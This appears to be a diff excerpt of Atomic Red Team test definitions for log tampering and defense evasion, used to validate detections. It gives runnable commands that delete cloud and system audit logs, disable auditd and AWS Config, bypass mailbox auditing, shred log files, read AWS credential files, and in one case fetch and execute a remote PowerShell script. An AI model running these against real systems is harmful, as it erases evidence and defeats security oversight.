#### Dependencies: Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```
### Atomic Test #8: AWS CloudWatch Log Stream Deletes
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
**Supported Platforms:** Iaas:aws
**auto_generated_guid:** `33ca84bc-4259-4943-bd36-4655dc420932`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cloudwatch_log_group_name | Name of the cloudWatch log group | string | test-logs|
| cloudwatch_log_stream_name | Name of the cloudWatch log stream | string | 20150601|
| region | Name of the region | string | us-west-2|
#### Attack Commands: Run with `sh`!
```sh
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
```
#### Dependencies: Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```
### Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox
Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
**Supported Platforms:** Office-365
**auto_generated_guid:** `c9a2f6fe-7197-488c-af6d-10c782121ca6`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | office-365 username | string | o365_user_test|
| password | office-365 password | string | o365_password_test|
| target_email | office-365 target_email | string | o365_email_test|
#### Attack Commands: Run with `powershell`!
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true
```
#### Cleanup Commands
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
```
#### Dependencies: Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
```
###### Get Prereq Commands
```powershell
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
```
### Atomic Test #10: GCP - Delete Activity Event Log
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied.
An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted.
This Atomic attempts to delete the Activity Event log. An event is generated under the method name of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.
**Supported Platforms:** Iaas:gcp
**auto_generated_guid:** `d56152ec-01d9-42a2-877c-aac1f6ebe8e6`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| project-id | ID of the GCP Project you to execute the command against. | string | atomic-project-1|
#### Attack Commands: Run with `sh`!
```sh
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
```
#### Dependencies: Run with `sh`!
##### Description: Requires gcloud
###### Check Prereq Commands
```sh
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
```
##### Description: Check if user is logged in
###### Check Prereq Commands
```sh
gcloud config get-value account
```
###### Get Prereq Commands
```sh
gcloud auth login --no-launch-browser
```
### Atomic Test #11: AWS - Config Logs Disabled
Disables AWS Config by stopping the configuration recorder, deleting the delivery channel, and deleting the configuration recorder. An attacker with sufficient permissions can use this to stop configuration change recording and avoid detection of subsequent activity.
**Supported Platforms:** Iaas:aws
**auto_generated_guid:** `4608bc1b-e682-466b-a7d7-dbd76760db31`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| configuration_recorder_name | Name of the configuration recorder | string | redatomictestconfigurationrecorder|
| delivery_channel_name | Name of the delivery channel | string | redatomictestdeliverychannel|
| region | Name of the region | string | us-west-2|
#### Attack Commands: Run with `sh`!
```sh
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
```
#### Cleanup Commands
```sh
aws configservice list-configuration-recorders --region us-west-2
```
#### Dependencies: Run with `sh`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```sh
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```sh
echo Please install the aws-cli and configure your AWS default profile using: aws configure
```
##### Description: Check if terraform is installed.
###### Check Prereq Commands
```sh
terraform version
```
###### Get Prereq Commands
```sh
echo Please install terraform and configure your AWS default profile
```
atomics/T1685.004/T1685.004.md
-89
View File
@@ -1,89 +0,0 @@
# T1685.004 - Disable or Modify Tools: Disable or Modify Linux Audit System Log
## Description from ATT&CK
> Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
>
> Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
>
> With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
[Source](https://attack.mitre.org/techniques/T1685/004)
## Atomic Tests
- [Atomic Test #1: Delete all auditd rules using auditctl](#atomic-test-1-delete-all-auditd-rules-using-auditctl)
- [Atomic Test #2: Disable auditd using auditctl](#atomic-test-2-disable-auditd-using-auditctl)
### Atomic Test #1: Delete all auditd rules using auditctl
Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs.
**Supported Platforms:** Linux
**auto_generated_guid:** `33a29ab1-cabb-407f-9448-269041bf2856`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
auditctl -D
```
#### Cleanup Commands
```sh
service auditd restart
```
#### Dependencies: Run with `sh`!
##### Description: Check if auditd is installed.
###### Check Prereq Commands
```sh
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
```
###### Get Prereq Commands
```sh
(yum install auditd -y) || (apt-get install auditd -y) || (dnf install auditd -y)
```
### Atomic Test #2: Disable auditd using auditctl
The command `auditctl -e 0` disables the audit system. By setting the parameter to `0`, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact security monitoring and compliance efforts.
**Supported Platforms:** Linux
**auto_generated_guid:** `7906f0a6-b527-46ee-9026-6e81a9184e08`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
auditctl -e 0
```
#### Cleanup Commands
```sh
auditctl -e 1
```
#### Dependencies: Run with `sh`!
##### Description: Check if auditd is installed.
###### Check Prereq Commands
```sh
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
```
###### Get Prereq Commands
```sh
(yum install auditd -y) || (apt-get install auditd -y) || (dnf install auditd -y)
```
atomics/T1685.005/T1685.005.md
-102
View File
@@ -1,102 +0,0 @@
# T1685.005 - Disable or Modify Tools: Clear Windows Event Logs
## Description from ATT&CK
> Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
>
>
> With administrator privileges, the event logs can be cleared with the following utility commands:
>
> * <code>wevtutil cl system</code>
> * <code>wevtutil cl application</code>
> * <code>wevtutil cl security</code>
>
> These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
>
> Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
[Source](https://attack.mitre.org/techniques/T1685/005)
## Atomic Tests
- [Atomic Test #1: Clear Logs](#atomic-test-1-clear-logs)
- [Atomic Test #2: Delete System Logs Using Clear-EventLog](#atomic-test-2-delete-system-logs-using-clear-eventlog)
- [Atomic Test #3: Clear Event Logs via VBA](#atomic-test-3-clear-event-logs-via-vba)
### Atomic Test #1: Clear Logs
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
**auto_generated_guid:** `e6abb60e-26b8-41da-8aae-0c35174b0967`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | string | System|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wevtutil cl #{log_name}
```
### Atomic Test #2: Delete System Logs Using Clear-EventLog
Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
**auto_generated_guid:** `b13e9306-3351-4b4b-a6e8-477358b0b498`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$logs = Get-EventLog -List | ForEach-Object {$_.Log}
$logs | ForEach-Object {Clear-EventLog -LogName $_ }
Get-EventLog -list
```
### Atomic Test #3: Clear Event Logs via VBA
This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
**Supported Platforms:** Windows
**auto_generated_guid:** `1b682d84-f075-4f93-9a89-8a8de19ffd6e`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Word must be installed
###### Check Prereq Commands
```powershell
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
```
atomics/T1685.006/T1685.006.md
-608
View File
@@ -1,608 +0,0 @@
# T1685.006 - Disable or Modify Tools: Clear Linux or Mac System Logs
## Description from ATT&CK
> Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
>
> * <code>/var/log/messages:</code>: General and system-related messages
> * <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs
> * <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records
> * <code>/var/log/kern.log</code>: Kernel logs
> * <code>/var/log/cron.log</code>: Crond logs
> * <code>/var/log/maillog</code>: Mail server logs
> * <code>/var/log/httpd/</code>: Web server access and error logs
[Source](https://attack.mitre.org/techniques/T1685/006)
## Atomic Tests
- [Atomic Test #1: rm -rf](#atomic-test-1-rm--rf)
- [Atomic Test #2: rm -rf](#atomic-test-2-rm--rf)
- [Atomic Test #3: Delete log files using built-in log utility](#atomic-test-3-delete-log-files-using-built-in-log-utility)
- [Atomic Test #4: Truncate system log files via truncate utility](#atomic-test-4-truncate-system-log-files-via-truncate-utility)
- [Atomic Test #5: Truncate system log files via truncate utility (freebsd)](#atomic-test-5-truncate-system-log-files-via-truncate-utility-freebsd)
- [Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero](#atomic-test-6-delete-log-files-via-cat-utility-by-appending-devnull-or-devzero)
- [Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)](#atomic-test-7-delete-log-files-via-cat-utility-by-appending-devnull-or-devzero-freebsd)
- [Atomic Test #8: System log file deletion via find utility](#atomic-test-8-system-log-file-deletion-via-find-utility)
- [Atomic Test #9: Overwrite macOS system log via echo utility](#atomic-test-9-overwrite-macos-system-log-via-echo-utility)
- [Atomic Test #10: Overwrite FreeBSD system log via echo utility](#atomic-test-10-overwrite-freebsd-system-log-via-echo-utility)
- [Atomic Test #11: Real-time system log clearance/deletion](#atomic-test-11-real-time-system-log-clearancedeletion)
- [Atomic Test #12: Delete system log files via unlink utility](#atomic-test-12-delete-system-log-files-via-unlink-utility)
- [Atomic Test #13: Delete system log files via unlink utility (freebsd)](#atomic-test-13-delete-system-log-files-via-unlink-utility-freebsd)
- [Atomic Test #14: Delete system log files using shred utility](#atomic-test-14-delete-system-log-files-using-shred-utility)
- [Atomic Test #15: Delete system log files using srm utility](#atomic-test-15-delete-system-log-files-using-srm-utility)
- [Atomic Test #16: Delete system log files using OSAScript](#atomic-test-16-delete-system-log-files-using-osascript)
- [Atomic Test #17: Delete system log files using Applescript](#atomic-test-17-delete-system-log-files-using-applescript)
- [Atomic Test #18: Delete system journal logs via rm and journalctl utilities](#atomic-test-18-delete-system-journal-logs-via-rm-and-journalctl-utilities)
- [Atomic Test #19: Overwrite Linux Mail Spool](#atomic-test-19-overwrite-linux-mail-spool)
- [Atomic Test #20: Overwrite Linux Log](#atomic-test-20-overwrite-linux-log)
### Atomic Test #1: rm -rf
Delete system and audit logs
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `989cc1b1-3642-4260-a809-54f9dd559683`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log|
| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
```
###### Get Prereq Commands
```sh
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
```
### Atomic Test #2: rm -rf
Delete messages and security logs
**Supported Platforms:** Linux
**auto_generated_guid:** `bd8ccc45-d632-481e-b7cf-c467627d68f9`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
rm -rf /var/log/messages
rm -rf /var/log/security
```
### Atomic Test #3: Delete log files using built-in log utility
This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
**Supported Platforms:** macOS
**auto_generated_guid:** `653d39cd-bae7-499a-898c-9fb96b8b5cd1`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
```
### Atomic Test #4: Truncate system log files via truncate utility
This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content
**Supported Platforms:** macOS
**auto_generated_guid:** `6290f8a8-8ee9-4661-b9cf-390031bf6973`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path of system log to delete. | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #5: Truncate system log files via truncate utility (freebsd)
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
**Supported Platforms:** Linux
**auto_generated_guid:** `14033063-ee04-4eaf-8f5d-ba07ca7a097c`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
truncate -s 0 /var/log/messages #size parameter shorthand
truncate --size=0 /var/log/security #size parameter
```
### Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
**Supported Platforms:** macOS
**auto_generated_guid:** `c23bdb88-928d-493e-b46d-df2906a50941`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path of system log to delete. | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
**Supported Platforms:** Linux
**auto_generated_guid:** `369878c6-fb04-48d6-8fc2-da9d97b3e054`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
```
### Atomic Test #8: System log file deletion via find utility
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
**Supported Platforms:** macOS
**auto_generated_guid:** `bc8eeb4a-cc3e-45ec-aa6e-41e973da2558`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_name1 | name or prefix of system log to delete. | string | system.log|
| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz|
| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution
sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
```
###### Get Prereq Commands
```sh
touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
```
### Atomic Test #9: Overwrite macOS system log via echo utility
This test overwrites the contents of system log file with an empty string using echo utility
**Supported Platforms:** macOS
**auto_generated_guid:** `0208ea60-98f1-4e8c-8052-930dce8f742c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo echo '' > #{system_log_path}
```
### Atomic Test #10: Overwrite FreeBSD system log via echo utility
This test overwrites the contents of system log file with an empty string using echo utility
**Supported Platforms:** Linux
**auto_generated_guid:** `11cb8ee1-97fb-4960-8587-69b8388ee9d9`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '' > /var/log/messages
```
### Atomic Test #11: Real-time system log clearance/deletion
This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
**Supported Platforms:** macOS
**auto_generated_guid:** `848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo log -f /var/log/system.log | : > /var/log/system.log
```
### Atomic Test #12: Delete system log files via unlink utility
This test deletes the system log file using unlink utility
**Supported Platforms:** macOS
**auto_generated_guid:** `03013b4b-01db-437d-909b-1fdaa5010ee8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo unlink #{system_log_path}
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #13: Delete system log files via unlink utility (freebsd)
This test deletes the messages log file using unlink utility
**Supported Platforms:** Linux
**auto_generated_guid:** `45ad4abd-19bd-4c5f-a687-41f3eee8d8c2`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
unlink /var/log/messages
```
### Atomic Test #14: Delete system log files using shred utility
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
**Supported Platforms:** macOS
**auto_generated_guid:** `86f0e4d5-3ca7-45fb-829d-4eda32b232bb`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo shred -u -z -n 3 #{system_log_path}
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #15: Delete system log files using srm utility
This test securely deletes the system log files individually and recursively using the srm utility.
Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
**Supported Platforms:** macOS
**auto_generated_guid:** `b0768a5e-0f32-4e75-ae5b-d036edcf96b6`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
| system_log_folder | path to log parent folder | string | /var/log/|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path} #{system_log_folder}
```
###### Get Prereq Commands
```sh
mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
```
### Atomic Test #16: Delete system log files using OSAScript
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
**Supported Platforms:** macOS
**auto_generated_guid:** `810a465f-cd4f-47bc-b43e-d2de3b033ecc`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #17: Delete system log files using Applescript
This test deletes the system log file using applescript using osascript via Finder application
Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
**Supported Platforms:** macOS
**auto_generated_guid:** `e62f8694-cbc7-468f-862c-b10cd07e1757`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| system_log_path | path to system.log | string | /var/log/system.log|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{system_log_path}
```
###### Get Prereq Commands
```sh
touch #{system_log_path}
```
### Atomic Test #18: Delete system journal logs via rm and journalctl utilities
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
**Supported Platforms:** Linux
**auto_generated_guid:** `ca50dd85-81ff-48ca-92e1-61f119cb1dcf`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| journal_folder | path to journal logs | string | /var/log/journal|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat #{journal_folder}
```
###### Get Prereq Commands
```sh
mkdir -p #{journal_folder} && touch #{journal_folder}/T1685.006.journal
```
### Atomic Test #19: Overwrite Linux Mail Spool
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** `1602ff76-ed7f-4c94-b550-2f727b4782d4`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | string | root|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo 0> /var/spool/mail/#{username}
```
#### Dependencies: Run with `sh`!
##### Description: target files must exist
###### Check Prereq Commands
```sh
stat /var/spool/mail/#{username}
```
###### Get Prereq Commands
```sh
touch /var/spool/mail/#{username}
```
### Atomic Test #20: Overwrite Linux Log
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
**Supported Platforms:** Linux
**auto_generated_guid:** `d304b2dc-90b4-4465-a650-16ddd503f7b5`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | path | /var/log/secure|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo 0> #{log_path}
```
#### Cleanup Commands
```bash
if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
```
atomics/T1685/T1685.md
-2361
View File
@@ -1,2361 +0,0 @@
# T1685 - Disable or Modify Tools
## Description from ATT&CK
> Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
>
> Adversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)
>
